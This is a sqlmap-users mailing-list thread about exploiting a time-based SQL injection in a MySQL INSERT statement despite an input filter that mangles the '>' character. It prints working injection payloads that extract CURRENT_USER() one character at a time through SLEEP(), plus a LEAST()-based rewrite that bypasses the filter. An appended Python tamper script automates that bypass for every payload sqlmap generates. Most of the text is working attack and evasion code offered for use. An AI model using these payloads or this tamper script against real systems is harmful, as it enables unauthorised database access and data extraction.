Just to add a bit to this, I tried something else that I got to work. I changed the sqlmap payload by using LEAST(), which became this:
',(SELECT/**/1/**/AND/**/9457=IF((LEAST(ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1)),16)=16),SLEEP(5),9457)/**/)),('

Is this something sqlmap can currently do? Or maybe there's a better solution for it? Or should I implement it? (Never looked at the sqlmap code, but it might be fun to start digging into it.)

Cheers for now!

On 2013-06-01 21:57, d...@alcor.se wrote:
> Hey guys,
>
> I have a server at work where there's an SQLi in an INSERT, but I can't
> prove that it's actually a threat so far due to a little "filter" that
> replaces some input characters.
>
> I crafted a little injection that injects a sleep into the insert, makes
> it sleep for 10 seconds, and then doesn't insert anything (due to a
> duplicate error that I made sure to get).
>
> The original query looks like this:
>
> insert into discount_phone_registry (phone_nbr,reg_date) values ('111',date(now()));
>
> And the injection is in the phone_nbr, so I made the following injection:
>
> 111',(SLEEP(10))),('111
>
> And it then becomes:
>
> insert into discount_phone_registry (phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
>
> So, so far so good, right?
>
> Well, when I wanted to use sqlmap, I noticed that our filter is doing
> some stupid things ^^
>
> This is the payload from sqlmap:
>
> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('
>
> But as it gets submitted in the form, it becomes:
>
> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('
>
> Notice how the > became a _.
>
> The tampering scripts I'm using are space2comment and charencode, and
> charencode actually seems to trick it, since I'm getting the less/greater
> char in the error output from the web server now. If I copy/paste the
> payload directly from the web server error output into the MySQL client
> and run it, it works.
>
> Is there anything else I can try to get this to work?
>
> PS: If it helps, I just noticed this!
>
> 1064 - You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use
> near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
>
> insert into discount_phone_registry (phone_nbr,reg_date) values ('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))
>
> Notice how it complains on ";16", which is probably the encoded sign (>).
>
> Thanks in advance! :-)

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
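Added example, not code from the thread or from sqlmap itself: the LEAST() rewrite discussed above, packaged in the shape of a sqlmap tamper script so that sqlmap applies it to every payload instead of the payload being patched by hand. One detail the manual rewrite glosses over: `LEAST(x,16)=16` is true whenever `x >= 16`, while sqlmap's bisection asks `x > 16`, so the threshold has to be shifted by one, i.e. `A>B` becomes `LEAST(A,B+1)=B+1`. The filename `tamper/least.py`, the `--tamper=least,...` invocation and the `PRIORITY.HIGHEST` setting (meant to run this rewrite before space2comment/charencode touch the payload) are assumptions about how a given sqlmap version loads and orders tamper scripts; sqlmap also ships `greatest.py` and `between.py` tampers that replace `>` for the same reason, so check the tamper/ directory of your version before writing your own. Operands are taken as a balanced identifier/function-call expression, so compound operands such as `a + 1 > 2` should be parenthesised, and `>` inside string literals is not special-cased.

```python
"""
LEAST()-based rewrite of '>' comparisons, in sqlmap tamper-script form.

Added example, not part of the mailing-list thread and not sqlmap's own code.
Targets input filters that mangle '>' (the thread's filter turned it into '_')
while leaving '(', ',' and '=' alone.

Semantics:  A > B  <=>  A >= B+1  <=>  LEAST(A, B+1) = B+1
The +1 matters: LEAST(A,16)=16 holds for A >= 16, one off from the A > 16
that sqlmap's character bisection expects.

Assumed usage (not checked against every sqlmap version):
save as tamper/least.py and run with --tamper=least,space2comment,charencode
"""

try:
    from lib.core.enums import PRIORITY  # present when loaded by sqlmap
    __priority__ = PRIORITY.HIGHEST      # assumption: run before other tampers
except ImportError:
    __priority__ = None                  # stand-alone / unit-test use

_IDENT = "_$."  # non-alphanumeric characters allowed inside a bare operand


def _operand_left(s, end):
    """Start index of the balanced operand that ends just before s[end]."""
    j = end - 1
    while j >= 0 and s[j].isspace():
        j -= 1
    depth = 0
    while j >= 0:
        c = s[j]
        if c == ")":
            depth += 1
        elif c == "(":
            if depth == 0:
                break
            depth -= 1
        elif depth == 0 and not (c.isalnum() or c in _IDENT):
            break
        j -= 1
    return j + 1


def _operand_right(s, start):
    """(begin, end) of the balanced operand starting at or after s[start]."""
    j = start
    while j < len(s) and s[j].isspace():
        j += 1
    begin = j
    if j < len(s) and s[j] == "-":  # allow a negative numeric literal
        j += 1
    depth = 0
    while j < len(s):
        c = s[j]
        if c == "(":
            depth += 1
        elif c == ")":
            if depth == 0:
                break
            depth -= 1
        elif depth == 0 and not (c.isalnum() or c in _IDENT):
            break
        j += 1
    return begin, j


def rewrite_gt(payload):
    """Replace each plain 'A>B' with 'LEAST(A,B+1)=B+1'; '>=' and '<>' are kept."""
    out = payload
    i = 0
    while True:
        i = out.find(">", i)
        if i < 0:
            return out
        if out[i + 1:i + 2] == "=" or out[i - 1:i] == "<":  # '>=' or '<>'
            i += 1
            continue
        lo = _operand_left(out, i)
        rb, re_ = _operand_right(out, i + 1)
        left, right = out[lo:i].strip(), out[rb:re_]
        if not left or not right:  # quoted strings, stray '>' etc.: leave alone
            i += 1
            continue
        # fold a numeric threshold (16 -> 17); otherwise emit (expr+1)
        bump = str(int(right) + 1) if right.isdigit() else "(%s+1)" % right
        repl = "LEAST(%s,%s)=%s" % (left, bump, bump)
        out = out[:lo] + repl + out[re_:]
        i = lo + len(repl)


def dependencies():
    pass


def tamper(payload, **kwargs):
    """sqlmap entry point: rewrite the payload, pass empty/None through."""
    return rewrite_gt(payload) if payload else payload


if __name__ == "__main__":
    # the payload from the thread, as posted
    print(tamper("',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST("
                 "CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)"
                 "/**/)),('"))
```

Run stand-alone it prints the thread's payload with `ORD(...)>16` turned into `LEAST(ORD(...),17)=17`; under sqlmap the same function runs on every generated payload, so the time-based bisection keeps working without `>` ever reaching the filter.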